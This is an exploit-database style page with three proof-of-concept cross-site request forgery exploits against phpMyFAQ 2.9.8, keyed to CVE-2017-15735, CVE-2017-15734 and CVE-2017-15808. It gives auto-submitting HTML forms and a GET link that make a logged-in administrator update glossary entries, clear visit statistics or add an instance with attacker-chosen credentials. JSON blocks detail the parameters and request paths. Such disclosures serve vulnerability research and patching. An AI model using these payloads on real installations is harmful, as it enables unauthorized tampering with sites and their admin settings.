phpMyFAQ 2.9.8 Cross Site Request Forgery

phpMyFAQ version 2.9.8 is vulnerable to Cross-Site Request Forgery (CSRF).

This phpMyFAQ version 2.9.8 is vulnerable to Cross-Site Request Forgery (CSRF).

This vulnerability allows an attacker to trick a logged-in user into performing unintended actions without their consent. Such actions could include modifying FAQ entries, changing user settings, or even administrative tasks if the victim is an administrator.

The attack works by crafting a malicious web page or link that, when visited by an authenticated user, silently sends a forged request to the phpMyFAQ application. Because the user is logged in, their browser automatically includes session cookies, making the request appear legitimate to the server.

The absence of proper CSRF tokens or other anti-CSRF mechanisms in affected requests is the underlying cause. Users are advised to upgrade to a patched version (e.g., 2.9.9 or later) to mitigate this risk.

# Exploit Title: phpMyFAQ 2.9.8 Cross-Site Request Forgery (CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15735

PoC:
While still logged in, open another browser window:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php?action=updateglossary" method="POST">
<input type="hidden" name="id" value="1">
<input type="hidden" name="item" value="Malicious Glossary Item">
<input type="hidden" name="definition" value="This is a malicious definition.">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Some Details:
{
"Protection Mechanisms Before Patch": "There was no CSRF token validation in place for the glossary modification actions (add, update, delete). The patch introduced CSRF token checks for both POST and GET requests to ensure that only authorized sessions could perform these actions.",
"File Navigation Chain": "Public Access Entry URL -> phpmyfaq/admin/index.php -> glossary.main.php -> glossary.edit.php",
"Execution Path Constraints": "The user must be authenticated with the necessary permissions ('editglossary') to reach and interact with the glossary functionality through the 'index.php' entry point. Without proper authentication, the server redirects to the login form.",
"Request Parameters": "id, item, definition",
"Request Method": "POST",
"Request URL": "http://phpmyfaq/admin/index.php?action=updateglossary",
"Final PoC": "```\n<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=updateglossary\" method=\"POST\">\n <input type=\"hidden\" name=\"id\" value=\"1\">\n <input type=\"hidden\" name=\"item\" value=\"Malicious Glossary Item\">\n <input type=\"hidden\" name=\"definition\" value=\"This is a malicious definition.\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>document.forms[0].submit();</script>\n </body>\n</html>\n```"
}



------

# Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ
# Software Link: https://github.com/thorsten/phpMyFAQ
# Version: 2.9.8
# Tested on: Ubuntu Windows
# CVE : CVE-2017-15734

PoC:
Get http://phpmyfaq/admin/index.php?action=clear-visits
Reproduction: While still logged in, open another browser window to access the link.

Some Details:
{
"Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
"File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
"Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
"Request Parameters": "action=clear-visits",
"Request Method": "GET",
"Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
"Final PoC": "<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>"
}



-----

# Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808


PoC:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php" method="GET">
<input type="hidden" name="action" value="ajax">
<input type="hidden" name="ajax" value="config">
<input type="hidden" name="ajaxaction" value="add_instance">
<input type="hidden" name="url" value="malicious">
<input type="hidden" name="instance" value="malicious_instance">
<input type="hidden" name="comment" value="CSRF Test">
<input type="hidden" name="email" value="This email address is being protected from spambots. You need JavaScript enabled to view it.">
<input type="hidden" name="admin" value="attacker">
<input type="hidden" name="password" value="password123">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Steps to Reproduce:
1. Save the following code as poc.html.
2. Log in phpmyfaq, and open the file in the same browser.
3. The outcome will occur.